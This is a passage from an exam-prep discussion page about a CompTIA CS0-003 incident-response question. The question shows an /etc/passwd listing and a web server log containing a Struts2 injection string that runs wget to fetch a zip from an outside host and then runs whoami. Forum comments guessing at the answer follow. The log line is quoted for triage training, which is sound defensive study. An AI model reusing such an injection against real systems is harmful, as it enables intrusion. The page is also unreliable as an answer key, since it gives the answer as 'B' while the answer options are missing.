Deal of The Day! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions

CompTIA Exam CS0-003 Topic 3 Question 30 Discussion

Actual exam question for CompTIA's CS0-003 exam
Question #: 30
Topic #: 3
[All CS0-003 Questions]

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Show Suggested Answer Hide Answer
Suggested Answer: B

The log output indicates an attempt to execute a command via an unsecured service account, specifically using a wget command to download a file from an external source. This suggests that the adversary is trying to exploit a vulnerability in the web server to run unauthorized commands, which is a common technique for gaining a foothold or further compromising the system. The presence of wget http://grohl.ve.da/tmp/brkgtr.zip indicates an attempt to download and possibly execute a malicious payload.


Contribute your Thoughts:

Wava
3 months ago
I bet the adversary is trying to 'git' their hands on the server. Get it? Git? Oh, come on, that was a good one!
upvoted 0 times
Therese
2 months ago
Agreed. Let's focus on securing the server and identifying any suspicious activity.
upvoted 0 times
...
Kayleigh
2 months ago
That's a possibility. We should investigate further to prevent any potential damage.
upvoted 0 times
...
Reena
2 months ago
I think they might be trying to execute commands through an unsecured service account.
upvoted 0 times
...
Trinidad
2 months ago
Haha, good one! But seriously, we need to figure out what the adversary is up to.
upvoted 0 times
...
...
Shakira
3 months ago
Denial-of-service attack on the web server? Pff, that's so 2005. Let's see some real hacking skills here, people.
upvoted 0 times
Jules
3 months ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Tresa
3 months ago
Creating a backdoor root account named zsh could also be a possibility. We need to be vigilant and consider all options.
upvoted 0 times
...
Raelene
3 months ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Socorro
3 months ago
Which of the following is the adversary most likely trying to do?
upvoted 0 times
...
Filiberto
3 months ago
I agree, executing commands through an unsecured service account seems more like what the adversary is trying to do in this case.
upvoted 0 times
...
Lindsey
3 months ago
Yeah, denial-of-service attacks are old news. Real hackers go for more sophisticated techniques.
upvoted 0 times
...
...
Ozell
4 months ago
A backdoor root account named zsh? That's just lazy. At least try to be a little more creative with your attacks, buddy.
upvoted 0 times
Alona
3 months ago
We should definitely investigate further and secure the server.
upvoted 0 times
...
Daron
3 months ago
Yeah, they're probably trying to gain access and control the server.
upvoted 0 times
...
Renay
3 months ago
Looks like they're trying to execute commands through the http service account.
upvoted 0 times
...
Na
3 months ago
Agreed, using a common username like 'root' is a dead giveaway.
upvoted 0 times
...
...
Pearlene
4 months ago
Wow, a beacon to a command-and-control server? This incident just got a whole lot more serious. We need to act fast!
upvoted 0 times
Yuki
3 months ago
Let's make sure to isolate the server from the network to prevent further damage.
upvoted 0 times
...
Laquita
4 months ago
I agree, we should also check for any other signs of compromise on the server.
upvoted 0 times
...
Louann
4 months ago
We need to analyze the situation carefully before taking any action.
upvoted 0 times
...
...
Trinidad
4 months ago
I believe the adversary is trying to execute commands through an unsecured service account.
upvoted 0 times
...
Eun
4 months ago
I agree with Kaycee, it seems like the most likely scenario based on the output.
upvoted 0 times
...
Delfina
4 months ago
Hmm, looks like someone's trying to execute commands through an unsecured service account. That's not good news at all.
upvoted 0 times
Avery
3 months ago
We need to act fast to prevent any further damage to the server.
upvoted 0 times
...
Sharmaine
3 months ago
I'll check the logs to see if there are any other suspicious activities going on.
upvoted 0 times
...
Amina
4 months ago
We should investigate further to see what commands they are trying to run.
upvoted 0 times
...
Cornell
4 months ago
I agree, it seems like they are trying to exploit the http service account.
upvoted 0 times
...
...
Kaycee
4 months ago
I think the adversary is trying to create a backdoor root account named zsh.
upvoted 0 times
...

Save Cancel